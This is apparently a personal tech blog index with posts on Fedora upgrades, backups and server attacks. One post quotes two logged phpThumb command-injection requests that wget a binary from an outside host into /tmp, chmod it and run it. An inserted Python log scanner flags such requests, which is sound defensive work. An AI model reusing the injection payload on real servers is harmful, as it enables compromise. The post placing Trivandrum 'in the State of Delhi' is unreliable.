happycattech.com One Year Anniversary - Gnome 3 Fedora 16 Update

Member for 6 months 4 weeks
Submitted by AlReaud on Thu, 05/24/2012 - 22:53

The website's first year rolls around, and looking back it was interesting. Most of the hacking disappeared over time, with just occasional attacks occurring on the testing server. Recently, there have been more shell attacks coming from the US itself, treated in the same manner as usual. Business is slow, and the only work recently has been mostly hooking up with Manuel Labor.

Gnome 3 / Fedora 16 still isn't satisfactory, but it has improved. I've learned not to log out, but to just close all applications and lock the screen. That seems to prevent the hard lockups that happen on logout. Well, at least I haven't tried recently. I've had no success with restarting the Gnome Shell via remote command shell when hard lockups occur. The problem isn't (usually) in the kernel, but in Gnome Shell.

There is also an interesting video quirk which appears to scramble the screen tiles, both on the background and in the application windows. It is not a memory

Fedora 14 Upgrade to Fedora 16 and GNOME 3: Not for the faint hearted...

Submitted by AlReaud on Sun, 02/26/2012 - 20:21

After waiting until Fedora 14 end of life to occur, I upgraded all systems to Fedora 16 except for one that had insufficient memory. Though the documentation says 768M, you should have at least one GB of RAM and three times that in swap. It is important to note, before you start, that the upgrade process works better from a root shell than from the X-Windows GUI. Editing inittab may be required to allow this.

The first thing you want to do with this upgrade is, obviously, back up any critical data onto a machine that you can still operate with, such as a laptop or onto non-volatile media such as good quality DVDs. However, if you don't have another computer, I would recommend that you do an extra dose of your medication of choice before you start. Next install grub2 via the command yum install grub2, if it isn't already installed. This will save your ass when the install doesn't start. Having grub2 will allow you to manually start the upgrade via the grub command line or fall back to the old kernel version if all else fails.

Next we need to install preupgrade via the command yum install preupgrade. Now before starting, ensure that you back up everything that you hold dear. That includes pictures, records, videos, anything that you can't afford to lose. Some things may not work as expected or may not work at all after the upgrade.

The next command that

Backing up the whole site

Submitted by AlReaud on Wed, 01/18/2012 - 20:52

Revised: 2016-09-03, Al Reaud, Happy Cat Technologies

The following script integrates backing up the database with backing up the site code. Please note that the descriptions in the script stand in for actual values. Those actual values must be edited in, depending on your site configuration, for the script to work.

This script is adapted from the updated fullsitebackup.sh script created by Bristolguy on Drupal.org. This script is currently operational on Ubuntu 16.04, and has not been tested on other versions of Linux.

The shell script is available here for your convenience, demo.full_site_backup.sh.txt.

full_site_backup.sh

Backing up the CMS Database

Submitted by AlReaud on Wed, 01/18/2012 - 19:51

Revised: 2016-09-12, Al Reaud, Happy Cat Technologies

The CMS database is the heart of any content management system. Its loss or damage will result in the loss and/or damage of all of your hard work, and that of your commentators, posters, and contributors. Below are two scripts that complement each other: one backs up the database into a SQL file, the other restores it from a SQL file.

Very Quiet on the Server Front

Submitted by AlReaud on Tue, 01/10/2012 - 22:21

NOTE: Updated 11/15/2016

Unusually so, actually. Some of the methods may be working. Attack vectors cycle through periodically, some brute forcing the root, some brute forcing non-existent accounts. I still haven't figured out how to trap the password strings coming in on the brute forcing. The majority of attacks last week came from CN, then the US.

The activity has changed to the on-line servers, where I occasionally get DOS attacks. The GoDaddy servers throttle down if they sense one going on, but sometimes mistake valid activity for a DOS attack. All that takes latency to a 3-7 second level, which is OK as long as it stays on the lower end.

A new tool that I'm learning is Metasploit. An excellent penetration testing tool, but with a fairly steep learning curve. Maybe one of these days I'll make enough money to buy the pro version…

Dissecting a Spoof Craigs List Email

Submitted by AlReaud on Tue, 12/27/2011 - 09:29

NOTE: Updated 11/15/2016

Today's blog entry will cover a little live action. This is a continuation of the attacks from French domains. Contrary to popular belief, all online attacks DO NOT ORIGINATE FROM CHINA!

Following the receipt of the below email, I examined the email in detail (clicking on the image opens a full size image in another tab or window).

Craigs List phishing email attempting to get your login.

The most important above is that when you hover over the link, you can see in the status bar

Punishment DDOS attacks on online server

Submitted by AlReaud on Sat, 12/24/2011 - 08:16

NOTE: Updated 11/15/2016

Attacks have ceased pretty much on the testing server, but I must have pissed somebody off last night. WOOT!

DDOS attacks started in the late evening, starting probably around 21:00 through at least probably midnight. Can't actually tell because I can't access the httpd logs. The positive note is this led to me asking GoDaddy where the httpd logs are, something I wasn't aware of (in FTP Manager). Bluehost allows access to the server logs, but Yahoo did not when I used them. It's a virtual machine so the logs don't compromise any hosting provider confidential data...

The offending IP addresses were:

  • 91.121.170.124 - FR, I know the bot-net there, and they have been getting inverse “Pavlovian Dog” training. I am almost willing to bet the control node resides in this general IP area,

Rise of the Machine. A week of wetware against bots...

Submitted by AlReaud on Fri, 12/23/2011 - 10:12

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL.

One of the most interesting, attack-wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168
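As an added defensive example, not part of the original post, the following Python script parses Apache combined-format log lines like the two above, URL-decodes the query string, and flags requests whose parameters carry shell command separators together with download/exec command names or /tmp drop paths. The two attack lines are the ones quoted above (re-joined onto single lines); the third, benign line and the indicator lists are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache combined-log prefix: client IP, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators that a query-string value carries shell syntax rather than data
# (constructed lists; extend them to match what your own logs show).
SEPARATORS = re.compile(r'[;|`]')                                 # command chaining / pipes
COMMANDS = re.compile(r'\b(wget|curl|chmod|bash|sh|ls|ps|nc)\b')  # fetch / exec / recon tools
TMP_PATHS = re.compile(r'/tmp/[\w.-]+')                           # world-writable drop locations

# Sample input: the two requests quoted in the post (each re-joined onto one line)
# plus one constructed benign request for comparison.
SAMPLE_LOG = [
    '161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/'
    'phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line'
    '%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk'
    '/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602',
    '161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/'
    'phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line'
    '%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk'
    '/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168',
    # constructed benign request
    '203.0.113.5 - - [23/Dec/2011:03:00:00 -0700] "GET /index.php?q=node/12&page=2 HTTP/1.1" 200 5120',
]


def parse_line(line):
    """Split one combined-log line into fields; the query string is URL-decoded."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['path'], _, query = rec['url'].partition('?')
    rec['query'] = unquote(query)
    return rec


def analyze(line):
    """Parse a line and attach the shell-injection indicators found in its query string."""
    rec = parse_line(line)
    if rec is None:
        return None
    q = rec['query']
    rec['separators'] = sorted(set(SEPARATORS.findall(q)))
    rec['commands'] = sorted(set(COMMANDS.findall(q)))
    rec['tmp_paths'] = sorted(set(TMP_PATHS.findall(q)))
    # A separator alone (e.g. the '|' inside an image filter spec) is weak evidence;
    # require a separator plus a command name or a /tmp drop path.
    rec['suspicious'] = bool(rec['separators']) and bool(rec['commands'] or rec['tmp_paths'])
    return rec


def suspicious_requests(lines):
    """Return (ip, path, commands) for every line that looks like command injection."""
    out = []
    for line in lines:
        rec = analyze(line)
        if rec and rec['suspicious']:
            out.append((rec['ip'], rec['path'], rec['commands']))
    return out


if __name__ == '__main__':
    for ip, path, cmds in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} -> {' '.join(cmds)}")
```

Running it over the three sample lines reports the two phpThumb requests (with wget, chmod, ls and ps in the decoded filter parameter) and stays silent on the benign one; in practice you would feed it the access log and hand the flagged IPs to fail2ban or a firewall rule.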

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses,

Persistent attacks from one IP in India

Submitted by AlReaud on Mon, 12/12/2011 - 08:10

NOTE: Updated 11/15/2016

Today's memorable entry is from Trivandrum Kerala, India, in the State of Delhi: 117.243.250.249

They are memorable because for some reason fail2ban didn't trap them. So they got to attack the shell 495 times instead of the nominal five. Zenmap indicates an unusual setup, with some open ports that are normally filtered, and things not normally seen, such as ipp, wpgs, route, and sip. An unknown port is open at 20717.

OpenVAS reports 14 low level weaknesses, with a server running at port 631. The interpretation of that is that the hacking is intentional, because without weakness present, it somewhat eliminates unintentional bots, as with the Church last week. Most of the systems examined so far have certain weaknesses present, such as http TRACE. This IP is clean of even moderate weaknesses.

Makes one wonder why they waste their